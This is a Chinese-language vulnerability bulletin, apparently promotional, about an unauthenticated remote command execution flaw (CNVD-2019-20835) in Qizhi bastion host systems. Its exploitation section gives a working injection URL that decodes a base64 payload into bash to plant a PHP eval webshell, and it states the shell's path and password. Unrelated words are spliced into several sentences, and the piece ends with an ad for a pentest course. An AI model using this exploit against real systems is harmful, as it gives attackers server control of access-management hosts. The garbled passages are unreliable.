現在HVV如火如荼進行中,接下來給給各位小伙伴帶來本次HVV中某個漏洞的播報(規則說明),以后每天會定時播報HVV中的漏洞及相關資訊,關注東塔小姐姐不迷路✌
01 堡壘機概念
各位小伙伴,大家都知道堡壘機主要是干什么的嗎?在網絡中處於什么位置嗎?今天我們一起來簡單了解一下,並介紹在本次HVV中出現的堡壘機漏洞和利用方法。
堡壘機,即在一個特定的網絡環境下,為了保障網絡和數據不受來自外部和內部用戶的入侵和破壞,而運用各種技術手段監控和記錄運維人員對網絡內的服務器、網絡設備、安全設備、數據庫等設備的操作行為,以便集中報警、及時處理及審計定責。
02 堡壘機在網絡中的位置
03 漏洞描述
本次HVV,紅隊利用其中一家堡壘機的漏洞,利用現有的EXP(什么是EXP,小伙伴自己去查詢一下喔),可直接獲取服務器權限,以下為該堡壘機漏洞的詳細描述。
齊治堡壘機2019年6月份之前的運維堡壘機系統存在 “前台遠程命令執行漏洞”(CNVD-2019-20835),攻擊者可利用該漏洞獲取服務器權限。
04 CNVD通告截圖
05 漏洞利用詳解
本漏洞觸發完全不需要登錄到系統即可執行;
這里假設10.20.10.10為堡壘機的IP地址:
1.訪問 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.
2.訪問如下鏈接即可getshell,執行成功后,學美語生成PHP一句話馬
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|
echo\${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash
|${IFS}|echo${IFS}
3./var/www/shterm/resources/qrcode/lbj77.php 密碼10086
其中加粗代碼部分是base64加密,需要解碼,解碼后如下所示 ��
轉碼的截圖 ��
分析:上述是PHP中經典的危險函數eval的用法,傳遞參數為10086,英語關聯詞采用GET或者POST傳遞參數都可以,對應的WebShell的路徑為
/var/www/shterm/resources/qrcode/lbj77.php,直接利用菜刀、蟻劍等工具連接即可。
06 修復建議
該漏洞的修復補丁已發布,如果客戶尚未修復該補丁,可聯系齊治科技的技術支持人員獲得具體幫助。更新至最新版本。
如果你不太懂網絡安全行業該怎么入門?或者說你覺得想要完全了解入門網絡安全所需要的知識是有一定難度的,托福成績單那東塔小姐姐非常推薦你學習7天滲透測試體驗營,現在限時特價9.9元。特訓營課程於9月21日開課,為期七天。名額有限,心動的話,就快快報名參加喲 ������